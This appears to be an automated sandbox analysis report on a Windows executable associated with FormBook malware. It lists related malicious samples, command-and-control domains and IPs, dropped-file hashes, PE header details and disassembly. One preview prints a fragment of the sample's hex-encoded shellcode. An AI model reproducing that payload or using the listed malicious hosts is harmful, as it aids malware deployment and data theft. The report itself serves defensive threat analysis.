EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 59
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: nJ8mJTmMf0.exe
Time | Type | Description
08:07:03 | API Interceptor | 10124554x Sleep call for process: PresentationHost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
78.111.111.51 | DHL Arrival Notice.exe | malicious | FormBook | www.threendresses.com/ecb1/
78.111.111.51 | Salary Raise.exe | malicious | FormBook | www.threendresses.com/ecb1/
78.111.111.51 | Salary List.exe | malicious | FormBook | www.threendresses.com/ecb1/
162.0.213.72 | DHL Arrival Notice.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | www.devele.top/nm4d/
162.0.213.72 | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | www.hawalaz.xyz/ercr/
162.0.213.72 | Shipping Documents.exe | malicious | FormBook | www.beescy.xyz/pdwc/
162.0.213.72 | Shipping Documents.exe | malicious | FormBook | www.beescy.xyz/pdwc/
162.0.213.72 | Salary Raise.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | U prilogu lista novih narudzbi.exe | malicious | DBatLoader, FormBook | www.hawalaz.xyz/ercr/
162.0.213.72 | Salary List.exe | malicious | FormBook | www.adoby.xyz/ghq5/
162.0.213.72 | IMG______6122024.exe | malicious | FormBook | www.beescy.xyz/pdwc/
162.0.213.72 | PO14624.exe | malicious | FormBook | www.beescy.xyz/pdwc/
188.114.97.3 | hkLFB22XxS.exe | malicious | FormBook | www.cavetta.org.mt/yhnb/
188.114.97.3 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/mJcm5Gfa/download
188.114.97.3 | http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.io | malicious | HTMLPhisher | emmalee.sa.com/favicon.ico
188.114.97.3 | file.exe | malicious | FormBook | www.cavetta.org.mt/yhnb/
188.114.97.3 | 6Z4Q4bREii.exe | malicious | DCRat, PureLog Stealer, zgRAT | 000366cm.nyashka.top/phpflowergenerator.php
188.114.97.3 | DHL Arrival Notice.exe | malicious | FormBook | www.coinwab.com/efdt/
188.114.97.3 | arrival notice_pdf.exe | malicious | FormBook | www.evoolihubs.shop/fwdd/?CbPtaF=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&NV=CzkTp6UpmNmd
188.114.97.3 | BbaXbvOA7D.exe | malicious | DCRat, PureLog Stealer, zgRAT | 228282cm.nyashka.top/ExternalimagevmRequestlongpollsqldbLocal.php
188.114.97.3 | j05KsN2280.exe | malicious | DCRat, PureLog Stealer, zgRAT | 640740cm.nyashka.top/providerEternalGameWindowstest.php
188.114.97.3 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/L69kvhYI/download
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.adoby.xyz | DHL Arrival Notice.exe | malicious | FormBook | 162.0.213.72
www.adoby.xyz | Salary Raise.exe | malicious | FormBook | 162.0.213.72
www.adoby.xyz | Salary List.exe | malicious | FormBook | 162.0.213.72
www.coinwab.com | DHL Arrival Notice.exe | malicious | FormBook | 188.114.97.3
www.coinwab.com | Salary Raise.exe | malicious | FormBook | 188.114.96.3
www.coinwab.com | Salary List.exe | malicious | FormBook | 188.114.97.3
www.coinwab.com | 900524362267263.exe | malicious | FormBook | 188.114.97.3
www.coinwab.com | dokaz o uplati.exe | malicious | DBatLoader, FormBook | 188.114.97.3
www.mqmsqkw.lol | DHL Arrival Notice.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | D02984-KP-002011.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | Salary Raise.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | REQN#1010135038.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | Salary List.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | Payroll List.exe | malicious | FormBook | 116.213.43.190
www.personalcaresale.shop | DHL Arrival Notice.exe | malicious | FormBook | 172.67.200.242
www.personalcaresale.shop | Salary Raise.exe | malicious | FormBook | 172.67.200.242
www.personalcaresale.shop | Salary List.exe | malicious | FormBook | 104.21.21.230
www.kosherphonestore.com.cdn.hstgr.net | DHL Arrival Notice.exe | malicious | FormBook | 154.62.106.34
www.kosherphonestore.com.cdn.hstgr.net | Shipping Documents.pdf.exe | malicious | FormBook | 77.37.53.194
www.kosherphonestore.com.cdn.hstgr.net | Salary Raise.exe | malicious | FormBook | 84.32.84.40
www.kosherphonestore.com.cdn.hstgr.net | Salary List.exe | malicious | FormBook | 154.41.249.175
www.washio.world | DHL Arrival Notice.exe | malicious | FormBook | 194.58.112.174
www.washio.world | Salary Raise.exe | malicious | FormBook | 194.58.112.174
www.washio.world | Salary List.exe | malicious | FormBook | 194.58.112.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | hkLFB22XxS.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | llD1w4ROY5.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | http://shippingservice-dhiexpress.dudaone.com/serviceid193811983/ | malicious | Unknown | 172.67.183.214
CLOUDFLARENETUS | FNB-Copy.pdf | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 172.64.151.101
CLOUDFLARENETUS | arrival notice.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | https://www.aspcp.uk | malicious | Unknown | 104.16.160.145
CLOUDFLARENETUS | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | FmQx1Fw3VA.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
CLOUDFLARENETUS | config.lnk.mal.lnk | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
DHOSTING-ASWarsawPolandPL | DHL Arrival Notice.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook | 109.95.158.122
DHOSTING-ASWarsawPolandPL | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook | 109.95.158.122
DHOSTING-ASWarsawPolandPL | KALIANDRA SETYATAMA PO 1310098007.exe | malicious | FormBook | 109.95.158.122
DHOSTING-ASWarsawPolandPL | D02984-KP-002011.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | Shipping Documents.pdf.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | Salary Raise.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | REQN#1010135038.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | Salary List.exe | malicious | FormBook | 109.95.158.127
DHOSTING-ASWarsawPolandPL | 900524362267263.exe | malicious | FormBook | 109.95.158.127
ACPCA | yUFX4wGvLW.elf | malicious | Mirai, Moobot | 162.54.102.167
ACPCA | DHL Arrival Notice.exe | malicious | FormBook | 162.0.213.72
ACPCA | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 162.0.213.72
ACPCA | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | 162.0.213.72
ACPCA | Shipping Documents.exe | malicious | FormBook | 162.0.213.72
ACPCA | Shipping Documents.exe | malicious | FormBook | 162.0.213.72
ACPCA | doc_Rfq_TNTM Spareparts TM00002916620 exp_pdf.com.exe | malicious | DarkCloud | 162.55.60.2
ACPCA | RFQ-ref_05921538.exe | malicious | DarkTortilla, FormBook | 162.0.209.224
ACPCA | yq5xNPpWCT.exe | malicious | PureLog Stealer, SystemBC | 162.55.5.235
ACPCA | Salary Raise.exe | malicious | FormBook | 162.0.213.72
AS-REGRU | Attendance list.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | XNP1BNVNqi.elf | malicious | Mirai | 80.78.252.5
AS-REGRU | DHL Arrival Notice.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | PTT request form.exe | malicious | FormBook | 37.140.192.90
AS-REGRU | PTT requested quotation.exe | malicious | FormBook | 37.140.192.90
AS-REGRU | 1Vkf7silOj.exe | malicious | LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc | 31.31.196.208
AS-REGRU | Shipping Documents.exe | malicious | FormBook | 37.140.192.90
AS-REGRU | Shipping Documents.exe | malicious | FormBook | 37.140.192.90
AS-REGRU | Document TOP19928.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | 3gQmWdKNmxvFltF.exe | malicious | FormBook | 31.31.196.133
ASFIBERSUNUCUTR | DHL Arrival Notice.exe | malicious | FormBook | 78.111.111.51
ASFIBERSUNUCUTR | Salary Raise.exe | malicious | FormBook | 78.111.111.51
ASFIBERSUNUCUTR | Salary List.exe | malicious | FormBook | 78.111.111.51
ASFIBERSUNUCUTR | file.exe | malicious | RisePro Stealer | 217.195.207.156
ASFIBERSUNUCUTR | file.exe | malicious | RisePro Stealer | 217.195.207.156
ASFIBERSUNUCUTR | SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exe | malicious | Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 217.195.207.156
ASFIBERSUNUCUTR | file.exe | malicious | RisePro Stealer | 217.195.207.156
ASFIBERSUNUCUTR | 80OrFCsz0u.exe | malicious | GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 217.195.207.156
ASFIBERSUNUCUTR | file.exe | malicious | PureLog Stealer, RisePro Stealer | 217.195.207.156
ASFIBERSUNUCUTR | SecuriteInfo.com.Win64.Evo-gen.28136.30716.exe | malicious | GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | 217.195.207.156
No context
No context
Process: C:\Windows\SysWOW64\PresentationHost.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\nJ8mJTmMf0.exe
File Type: data
Category: dropped
Size (bytes): 271360
Entropy (8bit): 7.995933022398111
Encrypted: true
SSDEEP: 6144:v4OXWgkdDQyOSs3kf/iKLAbKrqgkvxVHUCExFlKL3Uh/:vZXWxdaknDAGPAvlL3M
MD5: F55F544A432920A1847894F3EA679695
SHA1: 2B574459F719CC41DE187A57335E763FD7716C84
SHA-256: 9E4E28112EC79131789C3E129D08C484817EDC6A21CEBDA99C37D6B3F5F5B9BB
SHA-512: BB7D7B1278FC3295CBA5A32B3AC326F7788ECC1075134FD565A45DB8FA5992EFDC0AF851D10D799DC3674FC7460BEC22BDBCEF0E02DA47F3F8CBE6AA20C49BC5
Malicious: false
Reputation: low
                                                  Preview:.....G364...S.....P:....O^...HJX5G364S2SZ0OFU8AP9A1I7LV23KH.X5G=).]2.S.n.Tt.qm)X:.<$]T9)'xV&]X['.1?.=3;.(>..~..!9VVeEGR.G364S2S#1F.hX&..!V..,1.)..bU .,...o:W.\.lY&..^/>.S,.JX5G364Sb.Z0.GT8.V. 1I7LV23K.JZ4L2=4S WZ0OFU8AP9.%I7LF23KxNX5Gs64C2SZ2OFS8AP9A1I1LV23KHJX.C366S2SZ0ODUx.P9Q1I'LV23[HJH5G364S"SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LxFV3<JX5S#24S"SZ0]BU8QP9A1I7LV23KHJX.G3V4S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0

Process: C:\Users\user\Desktop\nJ8mJTmMf0.exe
File Type: data
Category: dropped
Size (bytes): 9864
Entropy (8bit): 7.5966586667893985
Encrypted: false
SSDEEP: 192:na0ZsqLUGeKtxWQa8wgK/IltCvbdpWAsdbSvy/BYWuzdDYkiTfnkdIqj:azqLFLtx3a8wgKJbgdm6/B3uRDcfnkdr
MD5: CED9A93CDE4CC83DDEBD0E01BE1C5510
SHA1: 77984E46DA0B635579D698D3C9EC8A63C7E9E2C7
SHA-256: 812AF30527DFDC70CAF2665591D8BDFB0DAC6290710E5B4034C64FE6D2B4101E
SHA-512: 3E9A032842EB9D101354C7031598DBED3D47FDE11207C4692C83BD886CE4927DDACB932609B51A25D40A9EE44DC63B16774EC8411D123AFC94B221536806EABB
Malicious: false
Reputation: low
                                                  Preview:EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3|v9..G.4.X.@8_..kc..i|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.

Process: C:\Users\user\Desktop\nJ8mJTmMf0.exe
File Type: ASCII text, with very long lines (28740), with no line terminators
Category: dropped
Size (bytes): 28740
Entropy (8bit): 3.593970899382246
Encrypted: false
SSDEEP: 768:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbCO+IFh6q84vfF3if6g0:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RP
MD5: 2E7DA5E61F48B1F70804F19E6D4FBDA5
SHA1: DB836BFEB5ED2421F22689B9F61ECBA570E3D1A9
SHA-256: 8C87363CD1DC94F6D978154BCDCCAACF4A98BA3520A24742D6EEA08EB9BD6F79
SHA-512: 11419D5BE4BBD7B9BBE8E29B9ED44AD09DC5055E3CEFC39F7E186F2477FF3453C67073588686B4D9EC213E31FA5E532F7244AE032DFE033AAAA988029EA8EBC7
Malicious: false
Reputation: low
                                                  Preview:606DABF73C37DFE5B6388B40F071263955F8071380D1EFA13173545CE7671ACF380x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c000000668995
                                                  Process:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):7.995933022398111
                                                  Encrypted:true
                                                  SSDEEP:6144:v4OXWgkdDQyOSs3kf/iKLAbKrqgkvxVHUCExFlKL3Uh/:vZXWxdaknDAGPAvlL3M
                                                  MD5:F55F544A432920A1847894F3EA679695
                                                  SHA1:2B574459F719CC41DE187A57335E763FD7716C84
                                                  SHA-256:9E4E28112EC79131789C3E129D08C484817EDC6A21CEBDA99C37D6B3F5F5B9BB
                                                  SHA-512:BB7D7B1278FC3295CBA5A32B3AC326F7788ECC1075134FD565A45DB8FA5992EFDC0AF851D10D799DC3674FC7460BEC22BDBCEF0E02DA47F3F8CBE6AA20C49BC5
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.....G364...S.....P:....O^...HJX5G364S2SZ0OFU8AP9A1I7LV23KH.X5G=).]2.S.n.Tt.qm)X:.<$]T9)'xV&]X['.1?.=3;.(>..~..!9VVeEGR.G364S2S#1F.hX&..!V..,1.)..bU .,...o:W.\.lY&..^/>.S,.JX5G364Sb.Z0.GT8.V. 1I7LV23K.JZ4L2=4S WZ0OFU8AP9.%I7LF23KxNX5Gs64C2SZ2OFS8AP9A1I1LV23KHJX.C366S2SZ0ODUx.P9Q1I'LV23[HJH5G364S"SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LxFV3<JX5S#24S"SZ0]BU8QP9A1I7LV23KHJX.G3V4S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0OFU8AP9A1I7LV23KHJX5G364S2SZ0
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.190082518573828
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:nJ8mJTmMf0.exe
                                                  File size:1'234'944 bytes
                                                  MD5:dd560917fd1166f8f9a3ca565e1c3957
                                                  SHA1:07e6f2b8aa9410f9a649353da7ca692b14d4a5c4
                                                  SHA256:8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e
                                                  SHA512:1c5823fb4be16263634e833f6cab448a3746d2b42f088f2f26bb6f73707502dc475c3e057fd239403d6fedf97727bcd4031a39d641e5784d9941bc5aad9b3003
                                                  SSDEEP:24576:pAHnh+eWsN3skA4RV1Hom2KXMmHa44xPAUJDFowvVLwi8QIzLYJ5:wh+ZkldoPK8Ya4cPAUJDFowvVLwUiLO
                                                  TLSH:6C45BE0273E2C032FFABA2739B66F24556BD79254133852F13981D79BD701B2263E663
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                  Icon Hash:aaf3e3e3938382a0
                                                  Entrypoint:0x42800a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66663540 [Sun Jun 9 23:05:36 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                  Instruction
                                                  call 00007F0A4912D3CDh
                                                  jmp 00007F0A49120184h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F0A4912030Ah
                                                  cmp edi, eax
                                                  jc 00007F0A4912066Eh
                                                  bt dword ptr [004C41FCh], 01h
                                                  jnc 00007F0A49120309h
                                                  rep movsb
                                                  jmp 00007F0A4912061Ch
                                                  cmp ecx, 00000080h
                                                  jc 00007F0A491204D4h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F0A49120310h
                                                  bt dword ptr [004BF324h], 01h
                                                  jc 00007F0A491207E0h
                                                  bt dword ptr [004C41FCh], 00000000h
                                                  jnc 00007F0A491204ADh
                                                  test edi, 00000003h
                                                  jne 00007F0A491204BEh
                                                  test esi, 00000003h
                                                  jne 00007F0A4912049Dh
                                                  bt edi, 02h
                                                  jnc 00007F0A4912030Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F0A49120313h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F0A49120365h
                                                  bt esi, 03h
                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD5 build 40629
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD5 build 40629
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x631f4 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12c000 | 0x7134 | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0xc8000 | 0x631f4 | 0x63200 | 691a3289d7b0d2898a2ac685463176c1 | False | 0.9342956927805801 | data | 7.906828215578044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x12c000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                  RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                  RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                  RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                  RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
